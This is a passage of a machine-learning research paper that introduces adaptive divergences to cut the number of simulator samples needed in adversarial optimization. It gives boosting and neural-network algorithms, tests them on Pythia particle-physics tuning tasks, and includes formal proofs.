reports high enough value, it serves as a ‘proof’ of differences between P and Q. If all pseudo-divergences from the family D report 0, then P and Q are equal almost everywhere as the family always includes JSD as a member. Formally, this intuition can be expressed with the following theorem. Theorem 1 If ADD is an adaptive divergence produced by an ordered and complete with respect to Jensen–Shannon divergence family of pseudo-divergences D, then for any two distributions P and Q: JSD(P,Q)=0 if and only if AD(P,Q)=0. A formal proof of Theorem 1 can be found in Appendix A2. Combined with the observation that AD(P,Q)≥0 regardless of P and Q, the theorem states that AD is a divergence in the same sense as JSD. This, in turn, allows to use adaptive divergences as a replacement for Jensen–Shannon divergence in Adversarial Optimization. As can be seen from the definition, adaptive divergences are designed to utilize low- capacity pseudo-divergences (with underlying low-capacity models) whenever it is possible: for a pair of distant P and Q one needs to train only a low-capacity model to estimate AD, using the most powerful model only to prove equality of distributions. As low-capacity models generally require fewer samples for training, AD allows an optimization algorithm to run for more iterations within the same time restrictions. Properties of ADD highly depend on the family D, and choice of the latter might either negatively or positively impact convergence of a particular optimization algorithm. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 7/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 1.0 0.5 0.0 0.5 1.0 1.5 1.0 0.5 0.0 0.5 1.0 1.5 generator ground-truth A 0.0 0.5 1.0 1.5 2.0 2.5 3.0 rotation angle 0.0 0.1 0.2 0.3 0.4 0.5 0.6 di ve rg en ce JSD linear AD logarithmic AD B 0.0 0.5 1.0 1.5 2.0 2.5 3.0 rotation angle 0.000 0.025 0.050 0.075 0.100 0.125 0.150 0.175 0.200 di ve rg en ce JSD AD, dropout AD, l2 C 4 3 2 1 0 1 2 3 4 4 3 2 1 0 1 2 3 generator ground-truth D 0.25 0.00 0.25 0.50 0.75 1.00 1.25 1.50 rotation angle 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 di ve rg en ce JSD linear AD logarithmic AD E 0.25 0.00 0.25 0.50 0.75 1.00 1.25 1.50 rotation angle 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 di ve rg en ce JSD AD, dropout AD, l2 F Figure 1 Synthetic examples. (A) and (D): ground-truth distributions and example configurations of generators. Both generators are rotated versions of the corresponding ground-truth distributions. (B) and (E): JSD—Jensen–Shannon divergences estimated by Gradient Boosted Decision Trees with 500 trees of depth 3 (B), 100 trees of depth 3 (E); linear AD and logarithmic AD—adaptive divergences based on the same models as JSD with linear and logarithmic capacity functions, dashed lines represent some pseudo- divergences from the families producing adaptive divergences. (C) and (F): JSD —Jensen–Shannon di- vergences estimated by fully-connected Neural Networks with one hidden layer with 64 units (C) and 32 units (F); AD, dropout and AD, l2—adaptive divergences based on the same architectures as the one for JSD, with dropout and l2 regularizations; dashed lines represent some of the pseudo-divergences from the dropout-produced family. See ‘Implementation’ for the implementation details. Full-size DOI: 10.7717/peerjcs.274/fig-1 Figure 1 demonstrates both cases: here, we evaluate JSD and four variants of ADD on two synthetic examples. In each example, the generator produces a rotated version of the ground-truth distribution and is parameterized by the angle of rotation (ground-truth distributions and examples of generator distributions are shown in Figs. 1A and 1D). In Figs. 1B and 1C AD shows behavior similar to that of JSD (both being monotonous and maintaining a significant slope in the respective ranges). In Fig. 1E, both variants of AD introduce an additional local minimum: as the rotation angle approaches π/2, marginal feature distributions become identical, which interferes with decision-tree-based algorithms (this is especially pronounced for AD with logarithmic capacity function as it prioritizes low-capacity models). This behavior is expected to impact convergence of gradient-based algorithms negatively. In contrast, in Fig. 1F neural-network-based AD with l2 regularization stays monotonous in the range [0,π/2] and keeps a noticeable positive slope, in contrast to saturated JSD. The positive slope is expected to improve convergence of gradient-based algorithms and, possibly, some variants of Bayesian Optimization. In contrast, neural-network-based Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 8/24 https://peerj.com https://doi.org/10.7717/peerjcs.274/fig-1 http://dx.doi.org/10.7717/peerj-cs.274 3Technically, this function should be extended on [0,+∞) to be in agreement with Definition 2. 4Note that introducing a continuous approximation of the ensemble by, for example, varying learning rate for the last base estimator in the current ensemble from 0 to ρ, eliminates discontinuity of AD. AD with dropout regularization behaves in a manner similar to adaptive divergences in Fig. 1E. The most likely explanation is that l2 regularization mostly changes magnitude of the predictions without significantly affecting the decision surface and, therefore, largely replicates behavior of JSD, while dropout effectively lowers the number of units in the network, which biases the decision surface towards a straight line (i.e., towards logistic regression). IMPLEMENTATION A general algorithm for computing an adaptive divergence is presented in Algorithm 1. This algorithm might be an expensive procedure as the algorithm probes multiple pseudo-divergences, and for each of these probes, generally, a model needs to be trained from scratch. However, two of the most commonly used machine learning models, boosting-based methods (Friedman, 2001) and Neural Networks, allow for more efficient estimation algorithms due to the iterative nature of training procedures for such models. Gradient boosted decision trees Gradient Boosted Decision Trees (Friedman, 2001) (GBDT) and, generally, boosting- based methods, being ensemble methods, intrinsically produce an ordered and complete with respect to Jensen–Shannon divergence family of pseudo-divergences in the manner similar to equation Eq. (5). This allows for an efficient AD estimation procedure shown by Algorithm 2. Here, the number of base estimators serves as capacity of pseudo- divergences, and mapping to α∈[0,1] is defined through an increasing capacity function c :Z+→[0,1].3 In our experiments, for ensembles of maximal size N , we use the following capacity functions: linear capacity: c(i)=c0 i N ; (10) logarithmic capacity: c(i)=c0 log(i+1) log(N +1) . (11) Notice, however, that Equation Eq. (5) defines a discrete variant of AD, which most certainly will result in a discontinuous function.4 This effect can be seen on Fig. 1E. Neural networks There is a number of ways to regulate the capacity of a neural network. One of the simplest options is to vary the total number of units in the network. This, however, would almost certainly result in a discontinuous adaptive divergence, similarly to Gradient Boosted Decision Trees (Fig. 1E), which is not ideal even for black-box optimization procedures. In this work, we instead use well-established dropout regularization Srivastava et al. (2014). Effects of dropout are somewhat similar to varying number of units in a network, but at the same time dropout offers a continuous parametrization—it is clear that setting dropout probability p to 0 results in an unregularized network, while p=1 effectively restricts classifier to a constant output and intermediate values of p produce models in between these extreme cases. To produce a family of pseudo-divergences we equip dropout Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 9/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 Algorithm 2 Boosted adaptive divergence Require: XP, XQ — samples from distributions P and Q, B — base estimator training al- gorithm, N — maximal size of the ensemble, c :Z+→[0,1]— capacity function; ρ — learning rate; F0←1/2 i←0 L0← log2 for i=1,...,N do if Li >c(i)log2 then Fi+1←Fi+ρ ·B(Fi,XP,XQ) Li+1←L(Fi+1,XP,XQ) i← i+1 else return log2−Li end if end for return log2−LN regularization with a linear capacity function: c(α)=1−α, where α corresponds to dropout probability p. Methods with explicit regularization terms can also be used to produce a family of pseudo-divergences. In this work, we examine l2 regularization on network weights as one of the most widely used. In this case, a family of pseudo-divergences is defined by equation Eq. (4) with a logarithmic capacity function: c(α)=−log(α). Regularization methods mentioned above were selected primarily due to their simplicity and popularity in the field. Our experiments indicate that these methods perform well. Nevertheless, further studies are required to determine best-performing regularization techniques. In our experiments, we observe that unregularized networks require significantly more samples to be properly trained than regularized ones. To reduce discriminator variance, we suggest to use additional regularization r, strength of which is independent from the capacity parameter α, e.g.: Dα(P,Q)= log2−L(f (θ ∗ ,·),P,Q); (12) θ ∗ = arg minθ∈2L(f (θ,·),P,Q)+c(1−α)·R(θ)+r(θ). In this work, following Louppe, Hermans & Cranmer (2017), we use gradient regularization r =R1 suggested by Mescheder, Geiger & Nowozin (2018). Note, that such family of pseudo-divergences is no longer complete w.r.t Jensen–Shannon divergence, i.e., D1 6= JSD. Nevertheless, D1 is still a proper divergence (Mescheder, Geiger & Nowozin, 2018) (which closely resembles JSD), and all results in this work hold with respect to such divergences including main theorems and claims, i.e., the family defined above still produces a (generalized) variant of adaptive divergence. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 10/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 The proposed procedures for estimating AD is outlined in Algorithms 3 and 4. As chosen regularization methods result in families of pseudo-divergences continuous w.r.t α, the proposed algorithm employs equation Eq. (8), i.e., it varies the strength of the regularization depending on the current values of the cross-entropy. The values of the loss function are estimated with an exponential moving average over losses on mini-batches during iterations of Stochastic Gradient Descent, with the idea that, for slowly changing loss estimations and small enough learning rate, network training should converge (Liu, Simonyan & Yang, 2018). We find that initializing exponential moving average with log2, which corresponds to the absent regularization, works best. Algorithm 3 Adaptive divergence estimation by a dropout-regularized neural network Require: XP, XQ — samples from distributions P and Q; fθ :X ×R→R — neural network with parameters θ ∈2, the second argument repre- sents dropout probability and is zero if unspecified; c — capacity function; ρ — exponential average coefficient; β — coefficient for R1 regularization; γ — learning rate of SGD. Lacc← log2 while not converged do xP ←sample(XP) xQ←sample(XQ) ζ ←c ( 1− Lacclog2 ) g0←∇θL(fθ(·,ζ),xP,xQ) g1←∇θ‖∇θfθ(xP)‖2 Lacc←ρ ·Lacc+(1−ρ)·L(fθ,xP,xQ) θ←θ−γ ( g0+βg1 ) end while return log2−L(fθ,XP,XQ) EXPERIMENTS Adaptive divergence was designed to require fewer samples than its conventional counterparts. However, for practical purposes, it is meaningless to consider this quantity outside the context of optimization. To illustrate this claim, consider the following divergence: ID(P,Q)= { 0, if P =Q almost everywhere; 1, otherwise. Such divergence can be estimated in a manner similar to that of adaptive divergence: starting with a low-capacity model, train the model to distinguish between P and Q, if the model reports any differences between distributions, return 1, otherwise increase the Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 11/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 5Code of the experiments is available at https://github.com/HSE-LAMBDA/rapid- ao/ 6This procedure requires generating an additional validation set of the size similar to that of the training set, which might be avoided by, e.g., using Bayesian inference, or cross-validation estimates. capacity of the model and repeat, until a sufficiently high capacity is reached, in which case return 0. In terms of the number of samples, ID is expected to be more efficient than AD; at the same time, ID is a textbook example of intrinsically hard optimization problem, rendering it useless for Adversarial Optimization. Therefore, we judge the performance of adaptive divergence only within an optimization procedure. Note that adaptive divergence is not expected to improve the optimization surface; nevertheless, as Fig. 1 demonstrates, the improvement is seemingly present in some instances; however, our experiments show that it does not play any significant role (see Appendix A3 for details). In the cases, when degradation of the optimization surface takes place, global optimization procedures, such as Bayesian Optimization, are still expected to benefit from the usage of AD by being able to perform more steps within the same budget on the number of generator calls. We compare adaptive divergence against JSD on three tasks,5 each task is presented by a parametrized generator, ’real-world’ samples are drawn from the same generator with some nominal parameters. Optimization algorithms are expected to converge to these nominal parameters. We evaluate the performance of adaptive divergences with two black-box optimization algorithms, namely Bayesian Optimization and Adversarial Variational Optimization. As computational resources spent by simulators are of our primary concern, we measure convergence of Adversarial Optimization with respect to the number of samples generated by the simulation, which is expected to be roughly proportional to the total time in case of computationally heavy simulations. We chose to neglect the time spent on training models as the proposed methods are intended for simulations that are significantly more computationally intensive than training of any model with a reasonable capacity, for example, running ATLAS simulation (The ATLAS Collaboration, 2010) for the same number of times as budgets in our experiments would require several years on a single-core CPU. To measure the number of samples required to estimate a divergence, we search for the minimal number of samples such that the difference between train and validation losses is within 10−2 for Gradient Boosted Decision Trees and 5·10−2 for Neural Networks.6 As a significant number of samples is involved in loss estimation, for simplicity, we use point estimations of losses. For GBDT, we utilize a bisection root-finding routine to reduce time spent on retraining classifiers; however, for more computationally expensive simulators, it is advised to gradually increase the size of the training set until the criterion is met. For each experiment, we report convergence plots—Euclidean distance from the current guess to the nominal parameters as a function of the number of examples generated by the simulator. As the performance of Bayesian Optimization is influenced by choice of the initial points (in our experiments, 5 points uniformly drawn from the search space), each experiment involving Bayesian Optimization is repeated 100 times, and aggregated results are reported. Similarly, experiments with Variational Optimization are repeated 20 times each.6 Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 12/24 https://github.com/HSE-LAMBDA/rapid-ao/ https://github.com/HSE-LAMBDA/rapid-ao/ https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 Algorithm 4 Adaptive divergence estimation by a regularized neural network Require: XP, XQ — samples from distributions P and Q; fθ :X →R — neural network with parameters θ∈2; R :2→R — regularization function; c — capacity function; ρ — exponential average coefficient; β — coefficient for R1 regularization; γ — learning rate of SGD. Lacc← log2 while not converged do xP ←sample(XP) xQ←sample(XQ) ζ ←c ( 1− Lacclog2 ) g0←∇θ [ L(fθ,xP,xQ)+ζ ·R(fθ) ] g1←∇θ‖∇θfθ(xP)‖2 Lacc←ρ ·Lacc+(1−ρ)·L(fθ,xP,xQ) θ←θ−γ ( g0+βg1 ) end while return log2−L(fθ,XP,XQ) XOR-like synthetic data This task repeats one of the synthetic examples presented in Fig. 1D: ground truth distribution is an equal mixture of two Gaussian distributions, the generator produces a rotated version of the ground-truth distribution with the angle of rotation being the single parameter of the generator. The main goal of this example is to demonstrate that, despite significant changes in the shape of the divergence, global optimization algorithms, like Bayesian Optimization, can still benefit from the fast estimation procedures offered by adaptive divergences. For this task, we use an adaptive divergence based on Gradient Boosted Decision Trees (100 trees with the maximal depth of 3) with linear and logarithmic capacity functions given by Eqs. (10) and (11) and c0 =1/4. Gaussian Process Bayesian Optimization with Matern kernel (ν=3/2 and scaling from [10−3,103] automatically adjusted by Maximum Likelihood fit) is employed as optimizer. Convergence of the considered divergences is shown in Fig. 2. As can be seen from the results, adaptive divergences tend to request fewer generator calls per estimation; and, given the same budget, both variants of adaptive divergence converge on parameters around an order of magnitude closer to the optimum than traditional JSD. Notice, that the initial rapid progress slows as optimizer approaches the optimum, and the slope of the curves becomes similar to that of JSD: this can be explained by AD approaching JSD as probed distributions become less distinguishable from the ground-truth one. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 13/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 7Note, that this task is rather a realistic toy example—in practical settings, Pythia event generator is followed by a much more computationally expensive detector simulation such as GEANT (Allison et al., 2016), the latter translates outcomes of an event generator, such as Pythia, into observable values. For comparison, full ATLAS simulation (event generator and detector simulation) mentioned above takes several minutes per sample, while Pythia alone typically require less than a second per event (milliseconds in our settings). 0 10000 20000 30000 40000 50000 60000 number of generator calls 10 2 10 1 100 Eu cl id ea n di st an ce to th e so lu tio n JSD linear AD logarithmic AD A 64 128 256 512 1024 2048 4096 8192 16384 generator calls per optimization step 0.00 0.05 0.10 0.15 0.20 0.25 fra ct io n of th e to ta l n um be r o f s te ps JSD linear AD logarithmic AD B Figure 2 XOR-like synthetic example, Gradient Boosted Decision Trees. (A) Convergence of Bayesian Optimization on: Jensen–Shannon divergence (marked as JSD), adaptive divergences with a linear capac- ity function (marked as linear AD), and a logarithmic capacity function (logarithmic AD). Each experi- ment was repeated 100 times; curves are interpolated, median curves are shown as solid lines, bands indi- cate 25th and 75th percentiles. (B) Distribution of computational costs per single optimization step mea- sured by the number of generator calls requested for divergence estimation; each optimization step re- quires exactly one divergence estimation; note logarithmic scaling of the x-axis. Full-size DOI: 10.7717/peerjcs.274/fig-2 Pythia hyper-parameter tuning This task is introduced by Ilten, Williams & Yang (2017) and involves tuning hyper- parameters of the Pythia event generator, a high-energy particle collision simulation used at CERN. For this task, electron-positron collisions are simulated at a center-of-mass energy 91.2 GeV. As initial electron and positron collide and annihilate, new particles are created, some of which are unstable and might decay into more stable particles. A collision event is described by the properties of the final (stable) products. This process is intrinsically stochastic (due to the laws of physics) and covers a large space of possible outcomes, moreover, even with relatively large changes in generator’s hyper-parameters, outcome distributions overlap significantly, which makes it an excellent example for adversarial optimization. The nominal parameters of the Pythia event generator are set to the values of the Monash tune (Skands, Carrazza & Rojo, 2014). In work by Ilten, Williams & Yang (2017), various physics-motivated statistics of events are used as observables,7 with a total of more than 400 features. The same statistics were originally used to obtain the Monash tune. For the purposes of the experiment, we consider one hyper-parameter, namely alphaSValue, with the nominal value of 0.1365 and search range [0.06,0.25].7 We repeat settings of the experiment8 described by Ilten, Williams & Yang (2017). We employ Gradient Boosting over Oblivious Decision Trees (CatBoost implementation by Prokhorenkova et al., 2018) with 100 trees of depth 3 and other parameters set to their default values. We use Gaussian Process Bayesian Optimization with Matern kernel (ν=3/2 and Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 14/24 https://peerj.com https://doi.org/10.7717/peerjcs.274/fig-2 http://dx.doi.org/10.7717/peerj-cs.274 8Methods proposed by Ilten, Williams & Yang (2017) compare a fixed set of statistics computed over multiple examples. As adversarial methods operate with individual examples, we use the same statistics computed for single events, i.e., original data can be recovered from ours by simply averaging across events. 0 10000 20000 30000 40000 50000 60000 number of generator calls 10 2 10 1 100 Eu cl id ea n di st an ce to th e so lu tio n JSD linear AD logarithmic AD A 64 128 256 512 1024 2048 4096 8192 16384 generator calls per optimization step 0.00 0.05 0.10 0.15 0.20 0.25 fra ct io n of th e to ta l n um be r o f s te ps JSD linear AD logarithmic AD B Figure 3 Pythia hyper-parameter tuning, CatBoost. (A) Convergence of Bayesian Optimization on: Jensen–Shannon divergence (marked as JSD), adaptive divergences with a linear capacity function (marked as linear AD), and a logarithmic capacity function (logarithmic AD). Each experiment was repeated 100 times, curves are interpolated, median curves are shown as solid lines, bands indicate 25th and 75th percentiles. (B) Distribution of computational costs per single optimization step measured by the number of generator calls requested for divergence estimation; each optimization step requires exactly one divergence estimation; note logarithmic scaling of the x-axis. Full-size DOI: 10.7717/peerjcs.274/fig-3 scaling from [10−3,103] automatically adjusted by Maximum Likelihood fit) as optimizer. Comparison of unmodified Jensen–Shannon divergence with adaptive divergences with linear and logarithmic capacity functions (defined by Eqs. (10) and (11) and c0 =1/4) presented onFig. 3.8 Results, shown in Fig. 3, indicate that, given the same budget, Bayesian Optimization over adaptive divergences yields solutions about an order of magnitude closer to the nominal value than Jensen–Shannon divergence. This acceleration can be attributed to the proposed estimation procedures that require far fewer generator calls than JSD. Additionally, notice that the slope of the convergence curves for AD gradually approaches that of AD as the proposal distributions become closer to the ground-truth one. Pythia alignment In order to test the performance of adaptive divergences with Adversarial Variational Optimization, we repeat the Pythia-alignment experiment suggested by Louppe, Hermans & Cranmer (2017). The settings of this experiment are similar to the previous one. In this experiment, however, instead of collecting physics-motivated statistics, we consider a simplified detector simulation, represented by a 32×32 spherical grid with cells uniformly distributed in pseudorapidity ν∈[−5,5] and azimuthal angle φ∈[−π,π] space. Each cell of the detector records the energy of particles passing through it. The detector has 3 parameters: x,y,z-offsets of the detector center relative to the collision point, where z-axis is placed along the beam axis, the nominal offsets are zero, and the initial Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 15/24 https://peerj.com https://doi.org/10.7717/peerjcs.274/fig-3 http://dx.doi.org/10.7717/peerj-cs.274 A B C D E F G H Figure 4 Illustration of the Pythia-alignment task. (A) Aggregated events for zero offset (the nomi- nal configuration), 0.25 offset along x-axis (B), y-axis (C), and z-axis (D). (E–H) Single-event examples from the corresponding configurations above—each activated pixel indicate a particle or multiple particles passing trough the corresponding region of the detector. Full-size DOI: 10.7717/peerjcs.274/fig-4 guess is (0.75,0.75,0.75). Figure 4 shows averaged detector responses for the example configurations and samples from each of these configurations. For this task, a 1-hidden-layer Neural Network with 32 hidden units and ReLU activation function is employed. R1 regularization, proposed by Mescheder, Geiger & Nowozin (2018), with the coefficient 10, is used for the proposed divergences and the baseline. Adam optimization algorithm (Kingma & Ba, 2014) with learning rate 10−2 is used to perform updates of the search distribution. We compare the performance of two variants of adaptive divergence (dropout and l2 regularization) described in ‘Implementation’. Results are shown in Fig. 5. Adaptive divergences require considerably fewer samples for their estimation than the baseline divergence with only R1 regularization, which, given the same budget, allows both variants of adaptive divergence to accelerate Adversarial Optimization significantly. Note that the acceleration is even more pronounced in comparison to JSD estimated by an unregularized network: in our experiments, to achieve the set level of agreement between train and test losses, the unregularized network often requires more samples than the entire budget. DISCUSSION To the best knowledge of the authors, this work is the first one that explicitly addresses computational costs of Adversarial Optimization for expensive generators. Interestingly, several recent developments, like Progressive GAN (Karras et al., 2017) and ChainGAN (Hossain et al., 2018), use multiple discriminators of increasing capacity; however, this is done mainly to compensate for the growing capacity of the generators and, probably, not for reducing computational costs. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 16/24 https://peerj.com https://doi.org/10.7717/peerjcs.274/fig-4 http://dx.doi.org/10.7717/peerj-cs.274 0 5000 10000 15000 20000 25000 30000 number of generator calls 100 2 × 10 1 3 × 10 1 4 × 10 1 6 × 10 1 Eu cl id ea n di st an ce to th e so lu tio n JSD AD, dropout AD, l2 A 128 256 512 1024 2048 4096 8192 16384 generator calls per optimization step 0.0 0.1 0.2 0.3 0.4 0.5 fra ct io n of th e to ta l n um be r o f s te ps JSD AD, dropout AD, l2 B Figure 5 Pythia-alignment, neural networks. (A) Convergence of Adversarial Variational Optimization on: adaptive divergence produced by l2 regularization (AD, l2), dropout regularization (AD, dropout), and the baseline divergence with constant R1 regularization (marked as JSD). Each experiment was repeated 20 times, curves are interpolated, median curves are shown by solid lines, bands indicate 25th and 75th per- centiles; steps-like patterns are interpolation artifacts. (B) Distribution of computational costs per single optimization step measured by the number of generator calls requested for divergence estimation; each optimization step requires exactly one divergence estimation; note logarithmic scaling of the x-axis. Full-size DOI: 10.7717/peerjcs.274/fig-5 Several recent papers propose improving stability of Adversarial Optimization by employing divergences other than Jensen–Shannon (Gulrajani et al., 2017; Arjovsky, Chintala & Bottou, 2017; Bellemare et al., 2017). Note that all results in this paper also hold for any divergence that can be formulated as an optimization problem, including Wasserstein (Arjovsky, Chintala & Bottou, 2017) and Cramer (Bellemare et al., 2017) distances. It can be demonstrated by adjusting Definition 2 and repeating the proof of Theorem 4 for a new divergence; presented algorithms also require only minor adjustments. Multiple works introduce regularization (Sønderby et al., 2016; Arjovsky, Chintala & Bottou, 2017; Roth et al. 2017; Kodali et al., 2017; Mescheder, Geiger & Nowozin, 2018) for improving stability and convergence of Adversarial Optimization. Most of the standard regularization methods can be used to regulate model capacity in adaptive divergences. Also, one can use these regularization methods in addition to adaptive divergence as any discriminator-based regularization effectively produces a new type of divergence. Pythia-alignment experiment (‘Pythia alignment’) demonstrates it clearly, where we use R1 regularization with constant coefficient in addition to varying-strength dropout and l2 regularization. As we discussed in ‘Adaptive Divergence’, properties of adaptive divergences highly depend on the underlying families of pseudo-divergences; the impact of various regularization schemes is a subject of future research. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 17/24 https://peerj.com https://doi.org/10.7717/peerjcs.274/fig-5 http://dx.doi.org/10.7717/peerj-cs.274 CONCLUSION In this work, we introduce adaptive divergences, a family of divergences meant as an alternative to Jensen–Shannon divergence for Adversarial Optimization. Adaptive divergences generally require smaller sample sizes for estimation, which allows for a significant acceleration of Adversarial Optimization algorithms. These benefits were demonstrated on two fine-tuning problems involving Pythia event generator and two of the most popular black-box optimization algorithms: Bayesian Optimization and Variational Optimization. Experiments show that, given the same budget, adaptive divergences yield results up to an order of magnitude closer to the optimum than Jensen–Shannon divergence. Note, that while we consider physics-related simulations, adaptive divergences can be applied to any stochastic simulation. Theoretical results presented in this work also hold for divergences other than Jensen– Shannon divergence. ACKNOWLEDGEMENTS We wish to thank Mikhail Hushchyn, Denis Derkach, and Marceline Ivanovna for useful discussions and suggestions on the text. APPENDIX A1: FORMAL DEFINITIONS AND PROOFS Definition 4 A model family M={Mα⊆F|α∈[0,1]} is complete and nested, if: (N0) (x 7→1/2)∈M0; (N1)] M1=F; (N2) ∀α,β∈[0,1] :(α<β)⇒(Mα⊂Mβ). Theorem 2 If a model family M={Mα ⊆F|α∈[0,1]} is complete and nested, then the family D={Dα :5(X)×5(X)→R|α∈[0,1]}, where: Dα(P,Q)= log2− inf f∈Mα L(f ,P,Q), (13) is a complete and ordered with respect to Jensen–Shannon divergence family of pseudo- divergences. Proof Let’s introduce function f0(x)=1/2. Now we prove the theorem by proving that the family satisfies all properties from Definition 2. Property (D0) Due to Properties (N0) and (N1), f0 is a member of each set Mα. This implies, that Dα(P,Q)≥0 for all α∈[0,1]. For P =Q, cross-entropy loss function L(f ,P,Q) achieves its minimum in f = f0, therefore, Dα(P,Q)=0 if P =Q for all α∈[0,1]. Therefore, for each α∈[0,1] Dα is a pseudo-divergence. Property (D1) From Properties (N2) follows, that for all 0≤α<β≤1: Dα(P,Q)= log2− inf f∈Mα L(f ,P,Q)≥ log2− inf f∈Mβ L(f ,P,Q)=Dβ(P,Q). Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 18/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 Property (D2) This property is directly follows from Property (N1) and Equation Eq. (13). Definition 5 If M is a parameterized model family M ={f (θ,·) :X →[0,1]| θ∈2}, then a function R :2→R is a proper regularizer for the family M if: (R1) ∀θ∈2 :R(θ)≥0; (R2) ∃θ0∈2 : ( f (θ,·)≡ 12 ) ∧(R(θ)=0). Theorem 3 If M is a parameterized model family: M ={f (θ,·)|θ ∈2}and M =F, R :2→R is a proper regularizer for M , and c : [0,1]→[0,+∞) is a strictly increasing function such, that c(0)=0, then the family D={Dα :5(X)×5(X)→R|α∈[0,1]}: Dα(P,Q) = log2− min θ∈2α(P,Q) L(f (θ,·),P,Q); 2α(P,Q) = arg minθ∈2L R α(θ,P,Q); LRα(θ,P,Q)=L(f (θ,·),P,Q)+c(1−α)R(θ); is a complete and ordered with respect to Jensen–Shannon divergence family of pseudo- divergences. Proof We prove the theorem by showing that the family D satisfies all properties from Definition 2. Property (D0) Due to Properties (R2), there exists suchθ0, that f (θ0,·)≡1/2 and R(θ0)=0. Notice, that, for all P and Q, LRα(θ0,P,Q)= log2 and L R α(θ,P,Q)≥L(f (θ,·),P,Q), therefore, Dα(P,Q)≥0 for all P,Q∈5(X) and for all α∈[0,1]. For the case P =Q, θ0 also delivers minimum to L(f (θ0,·),P,Q)+c(1−α)R(θ0), thus, Dα(P,Q)=0 if P =Q. This proves Dα to be a pseudo-divergence for all α∈[0,1]. Property (D1) Let’s assume that 0≤α < β ≤1, yet, for some P and Q, Dα(P,Q) > Dβ(P,Q). The latter implies, that: min θ∈4α L(f (θ,·),P,Q)< min θ∈4β L(f (θ,·),P,Q); (14) where: 4α=2α(P,Q) and 4β =2β(P,Q). Let us pick some model parameters: θα ∈Arg minθ∈4αL(f (θ,·),P,Q); θβ ∈Arg minθ∈4βL(f (θ,·),P,Q). Since θβ ∈4β, then, by the definition of 2β(P,Q): LRβ(θβ,P,Q)≤L R β(θα,P,Q). (15) From the latter and assumption (Eq. 14) follows, that R(θβ)<R(θα). By the conditions of the theorem, C =c(1−α)−c(1−β)>0 and: C ·R(θβ)<C ·R(θα). (16) Adding inequality Eq. (15) to inequality Eq. (16): LRα(θβ,P,Q)<L R α(θα,P,Q), which contradicts the definition of θα. This, in turn, implies that the assumption Eq. (14) contradicts conditions of the theorem. Property (D2) Since c(0)=0 and M =F, D1= JSD by the definition. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 19/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 APPENDIX A2. PROOF OF THEOREM 1 Theorem 4 If ADDis an adaptive divergence produced by a complete and ordered with respect to Jensen–Shannon divergence family of pseudo-divergences D, then for any two distributions P and Q: JSD(P,Q)=0 if and only if AD(P,Q)=0. Proof For convenience, we repeat the definition of an adaptive divergence ADD here: ADD(P,Q)= inf { Dα(P,Q)|Dα(P,Q)≥(1−α)log2 } . (17) Firstly, we prove that from JSD(P,Q)=0 follows ADD(P,Q)=0. Due to Property (D2), D1(P,Q)= JSD(P,Q)=0, therefore, ∀α∈[0,1] :Dα(P,Q)=0 due to Properties (D2) (pseudo-divergences form a non-decreasing sequence) and (P1) (non-negativity of pseudo-divergences), which, in turn, implies that AD(P,Q)= inf{0}=0. Secondly, we prove that from ADD(P,Q)=0 follows JSD(P,Q)=0. Let’s assume that, for some P and Q, AD(P,Q)=0, but JSD(P,Q)=C > 0. Let us define the set of active capacities AD(P,Q) as follows: AD(P,Q)= { α|Dα(P,Q)≥(1−α)log2 } . (18) Note, that for every proper family D and for every pair of P and Q: {1}⊆AD(P,Q) and, if α∈AD(P,Q) then [α,1]⊆AD(P,Q). The latter follows from Property (D1) (pseudo-divergences form a non-decreasing sequence) and the fact, that (1−α)log2 is a strictly decreasing function.The previous statement implies that there are three possible forms of AD(P,Q): 1. a single point: AD(P,Q)={1}; 2. an interval: AD(P,Q)=[β,1]; 3. a half-open interval: AD(P,Q)=(β,1]; for some β∈[0,1). The first case would contradict our assumptions, since ADD(P,Q)= inf{D1(P,Q)}= C > 0. To address the last two cases, note, that ∀α ∈ AD(P,Q) : Dα(P,Q)≥ (1−β)log2 > 0 due to the definition of AD(P,Q). However, this implies that ADD(P,Q)= inf{Dα(P,Q)|α∈AD(P,Q)}≥(1−β)log2 > 0, which contradicts our assumptions.From the statements above, we can conclude that if ADD(P,Q)=0, then JSD(P,Q)=0. Combined with the previouly proven (JSD(P,Q)=0)⇒(ADD(P,Q)=0), this finishes the proof. APPENDIX A3. SOURCE OF THE ACCELERATION Figures 2, 3 and 5 demonstrate that usage of adaptive divergence allows to accelerate Adversarial Optimization and lower requirements on the number of generator calls clearly play a major role. Nevertheless, this acceleration can be potentially attributed to the changes in the shape of the target function. Figure 6 shows convergence plots for the experiments described above; however, the x-axis corresponds to the optimization step rather than number of generator calls. These convergence plots demonstrate that changes in shape either do not affect convergence speed (Figs. 6A and 6B) or have a negative impact (Fig. 6C). Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 20/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 0.0 2.5 5.0 7.5 10.0 12.5 optimization step 10 2 10 1 100 Eu cl id ea n di st an ce to th e so lu tio n JSD linear AD logarithmic AD A 0 2 4 6 8 10 